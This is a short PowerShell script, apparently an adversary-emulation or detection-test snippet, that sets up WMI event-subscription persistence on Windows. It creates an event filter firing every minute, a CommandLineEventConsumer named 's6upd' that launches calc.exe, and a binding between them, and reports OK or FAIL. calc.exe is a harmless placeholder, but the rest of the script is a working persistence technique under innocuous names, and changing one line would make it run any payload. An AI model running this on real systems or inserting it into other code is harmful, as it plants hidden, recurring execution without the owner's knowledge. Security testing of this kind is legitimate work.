& { $filterNS = "root\cimv2" $wmiNS = "root\subscription"

1. & {
2.  
3. $filterNS = "root\cimv2"
4. $wmiNS = "root\subscription"
5. $cliTemplate = "calc.exe"
6. $targetConsumerName = "s6upd"
7. $targetTriggerName = "s6tick"
8. Try {
9. gwmi -Class __FilterToConsumerBinding -Namespace $wmiNS | ForEach-Object {
10. $consumerName = ($_.Consumer -Split'=',2)[-1] -Replace '"',''
11. $triggerName = ($_.Filter -Split'=',2)[-1] -Replace '"',''
12. if ($consumerName -eq $targetConsumerName -and $triggerName -eq $targetTriggerName) {
13. Write-Host "AOK"
14. Exit 0
15. }
16. }
17. $filterQuery = "SELECT * FROM __InstanceModificationEvent Where TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Second=5"
18. $filter = swmi -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$targetTriggerName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$filterQuery}
19. $consumer = swmi -Class CommandLineEventConsumer -Namespace $wmiNS -Arguments @{name=$targetConsumerName; CommandLineTemplate=$cliTemplate; WorkingDirectory="C:\\"}
20. $binding = swmi -Class __FilterToConsumerBinding -Namespace $wmiNS -Arguments @{Filter=$filter; Consumer=$consumer}
21. if ($binding -AND $consumer -AND $filter) {
22. Write-Host "OK"
23. } else {
24. Write-Host "FAIL"
25. }
26. Exit 0
27. } Catch { Write-Host "$_"; Exit 0 }
28. }